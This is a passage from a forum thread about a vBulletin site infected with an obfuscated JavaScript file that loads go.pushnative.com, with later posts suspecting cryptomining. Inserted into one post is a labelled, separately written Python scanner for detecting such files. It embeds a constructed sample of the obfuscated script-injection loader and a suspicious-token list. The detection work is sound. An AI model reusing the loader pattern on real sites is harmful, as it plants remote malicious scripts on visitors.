
Thread: AVF is infected with Malware

  1. #11
    AVF Regular
    Join Date
    Mar 2013
    Location
    Adelaide
    Posts
    639
    Quote Originally Posted by Dogamondo View Post
    Javascript dev for the past 15 years here.
    Obfuscated JS is basically a process of making it very difficult to be human readable. It started out as a way to reduce the file size (called minification) and then as a way to protect intellectual property, and then by attackers as a way to inject malicious javascript into a website for phishing and malware without easily being decoded.
    I've had a look at the file on this site that was picked up by the Sucuri site. I ran it through a deobfuscator to try and figure out what it's doing.
    The file is very heavily obfuscated and injects a connection to an external website via a client-side request.
    From inspecting the web connections made after loading aussievapers.com, it appears the connection is to a site called go.pushnative.com, which is a high risk malware site according to McAfee:
    https://www.mcafee.com/threat-intell...pushnative.com
    I would say this script is definitely malware as it's disguised as an MD5 (encryption algorithm) script that sits with all the client side VBulletin script files (the forum software that this site runs).
    All the legit scripts are easily readable and have header information, whereas this script looks like it's been placed there deliberately by an attacker (probably a common exploit in the VBulletin software that allowed hackers to put the script there).
    This script isn’t run if you are logged in, it only appears in the client side scripts folder when first visiting the site.
    While typing this the browser on my test machine has crashed twice since visiting the forum home page.
    I'm not sure whether the popups are related to this as they seem to be advertising related. Maybe someone can confirm if Jato is monetising this site using the popup ads? If not then it's clear that AussieVapers has been hacked sometime in the last few months.
    The first thing Jato should do is to delete the clientscript/vbulletin_md5.js file as this seems to be the offending file, then update VBulletin and run a scan on the whole aussievapers.com.au domain to make sure there are no other malicious files on the server.
    Update: The popup issue and VBulletin vulnerability confirmed with potential fix here:
    Malicious Pop-ups in vBulletin - Sucuri Research - Website Monitoring, Recovery and Protection
    Wow, looks like you had a little fun writing that one up!
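    As an added defender-side illustration (not code from this thread, from Dogamondo, or from vBulletin), the script below is a small Python heuristic scanner for a vBulletin clientscript/ directory. It flags files that look like the one described above: no vBulletin header comment, use of eval() or String.fromCharCode, long runs of \xNN hex escapes, and script URLs pointing at hosts outside the site's own (go.pushnative.com in the constructed sample). The two file contents, the list of "own" hosts and the scoring thresholds are all assumptions made for the example.

```python
"""Heuristic scan of a vBulletin clientscript/ directory for injected JS.

Added example, not code from the thread or from vBulletin. Scoring
thresholds and the sample file contents below are assumptions.
"""
import re
import sys
from pathlib import Path

# Constructed stand-ins for two files in clientscript/. The first mimics the
# header comment shipped vBulletin scripts carry; the second mimics the
# injected vbulletin_md5.js described in the thread: hex-escaped strings,
# eval(), and a script tag pointing at go.pushnative.com.
CONSTRUCTED_FILES = {
    "vbulletin_global.js": (
        "/*==========================================*\\\n"
        "|| # vBulletin 4.2.4                        ||\n"
        "|| # Copyright vBulletin Solutions Inc.      ||\n"
        "\\*==========================================*/\n"
        "function fetch_object(idname) {\n"
        "    return document.getElementById(idname);\n"
        "}\n"
    ),
    "vbulletin_md5.js": (
        # 'https://go.pushnative.com/load', 'src', 'script' as \xNN escapes
        "var _0x2f1a=['\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x67\\x6f\\x2e"
        "\\x70\\x75\\x73\\x68\\x6e\\x61\\x74\\x69\\x76\\x65\\x2e\\x63\\x6f\\x6d"
        "\\x2f\\x6c\\x6f\\x61\\x64','\\x73\\x72\\x63',"
        "'\\x73\\x63\\x72\\x69\\x70\\x74'];"
        "eval(String.fromCharCode(118,97,114,32,120,61,49,59));"
        "var s=document.createElement(_0x2f1a[2]);s[_0x2f1a[1]]=_0x2f1a[0];"
        "document.body.appendChild(s);"
    ),
}

# Tokens that legitimate, readable forum scripts rarely need.
SUSPICIOUS_TOKENS = ("eval(", "unescape(", "String.fromCharCode", "atob(", "document.write(")
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")


def has_vbulletin_header(text):
    """Shipped vBulletin scripts open with a block comment naming the product."""
    head = text.lstrip()[:300]
    return head.startswith("/*") and "vBulletin" in head


def decode_hex_escapes(text):
    """Turn \\xNN escapes back into characters so encoded URLs become visible."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def external_hosts(text, own_hosts):
    """Hosts referenced by http(s) URLs, after decoding, excluding the site's own."""
    found = {h.lower() for h in URL_HOST.findall(decode_hex_escapes(text))}
    return sorted(found - set(own_hosts))


def scan_source(name, text, own_hosts=()):
    """Score one script; the thresholds are assumptions tuned to this sample."""
    findings = {
        "file": name,
        "has_header": has_vbulletin_header(text),
        "tokens": [t for t in SUSPICIOUS_TOKENS if t in text],
        "hex_escapes": len(HEX_ESCAPE.findall(text)),
        "external_hosts": external_hosts(text, own_hosts),
    }
    score = 0
    if not findings["has_header"]:
        score += 1
    score += len(findings["tokens"])
    if findings["hex_escapes"] >= 10:
        score += 2
    score += 2 * len(findings["external_hosts"])
    findings["score"] = score
    findings["suspicious"] = score >= 3
    return findings


def scan_directory(directory, own_hosts=()):
    """Scan every *.js file under a real clientscript/ directory."""
    return [scan_source(p.name, p.read_text(errors="replace"), own_hosts)
            for p in sorted(Path(directory).glob("*.js"))]


def report(findings):
    for f in findings:
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"{flag:10} {f['file']} score={f['score']} "
              f"hosts={f['external_hosts']} tokens={f['tokens']}")


if __name__ == "__main__":
    # Assumed list of the forum's own hostnames; adjust for a real site.
    own = ("aussievapers.com", "www.aussievapers.com", "aussievapers.com.au")
    if len(sys.argv) > 1:
        report(scan_directory(sys.argv[1], own))
    else:
        report([scan_source(n, t, own) for n, t in CONSTRUCTED_FILES.items()])
```

    Run it with no arguments to see the two constructed samples scored, or pass the path of a real clientscript/ directory. The hex-escape decoding is what makes the external host visible: the raw file never contains the string "pushnative", which is exactly why a plain grep over the directory would miss it.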

  2. #12
    Super Moderator
    Join Date
    Aug 2012
    Location
    Central Vic,up near the Murray
    Posts
    17,896
    Excellent detective work Dogamondo !!!
    I stand corrected
    ( see folks told you I was wrong lol )

    I have emailed your response to Jato for his info ... hopefully it gets sorted

    Cheers folks ... unfortunately us mods are not in the position to do anything about it so fingers crossed !
    EPM V2-18490 (X2 ),GP Spheroid V2.5 and GP Piccolo V2.5 ,BBCB, Provari mini's, REO mini V2.1, 18490 REO , Jazz Carto Pipes ( fitted with GA tank and churchwarden stem Totally Evil!!! ), Meerschaum pipe ,e-holly35W,Phideas, AIOS,Taifun atties, PC Pipe mods.PC Squonker, Svapiamo squonker, GP Paps Heron combo.

    Vaping since 2007 totally smoke free since 2011


    AVF Rules , Read and understand them

  3. #13
    AVF Regular
    Join Date
    Feb 2017
    Location
    Sydney
    Posts
    884
    Hahahah... So happy a JS dude looked into this. And you are right this started happening a few months back. Remembered everyone hammering FM to hassle Jato to fix the issue. hahahahah



  4. #14
    AVF Regular
    Join Date
    Jan 2014
    Location
    victoria
    Posts
    5,676
    Just wondering, is malware the only thing infecting AVF? Have noticed particularly in the past 2-3 days that AVF numbers are well down - it has been extremely rare over the last few years to see only 3-5 members online, and numbers reading as online are really well down from what they are normally - but we have been getting it nonetheless - Is something else happening or has the malware gotten worse?
    Last edited by rebelagainstthemachine; 16-11-17 at 08:43 AM.
    "I thought I was just in a bad mood- but its been a few years ...so I guess that's who I am now"

    Comic Database: Steve Hughes... Offended?
    https://www.youtube.com/watch?v=fHMoDt3nSHs

  5. #15
    AVF Regular
    Join Date
    Nov 2016
    Location
    sunshine coast qld
    Posts
    1,448
    Quote Originally Posted by rebelagainstthemachine View Post
    Is something else happening
    Something else is happening: something is using all the CPU horsepower on the main page.

    home page loaded

    home page not loaded
    If you know it, help someone.
    If you don't know it, ask.


    On land a line is an inanimate object; under water it has a life of its own.

  6. #16
    Super Moderator
    Join Date
    Aug 2012
    Location
    Central Vic,up near the Murray
    Posts
    17,896
    Seems we may have picked up a new hitch-hiker ... I just emailed Jato about it ... that's the limit of what I can do sadly .

  7. #17
    AVF Regular
    Join Date
    Nov 2016
    Location
    sunshine coast qld
    Posts
    1,448
    Could be mining software or something.

    Also I reckon we should all get his email and push to fix it, or release the admin login to someone so we don't have these issues.

  8. #18
    AVF Regular
    Join Date
    Aug 2016
    Location
    Sydney
    Posts
    850
    ABP addon for FireFox has helped keep the MALWARE away for me. ABP reported 4 stopped today.

  9. #19
    AVF Regular
    Join Date
    Nov 2016
    Location
    sunshine coast qld
    Posts
    1,448
    Quote Originally Posted by chris_vaper View Post
    ABP addon for FireFox has helped keep the MALWARE away for me. ABP reported 4 stopped today.
    Can't stop mining software.

  10. #20
    AVF Regular
    Join Date
    Nov 2016
    Location
    sunshine coast qld
    Posts
    1,448
    Well, we are being used to mine cryptocurrency.


Powered by vBulletin® Version 4.2.4
Copyright © 2018 vBulletin Solutions, Inc. All rights reserved.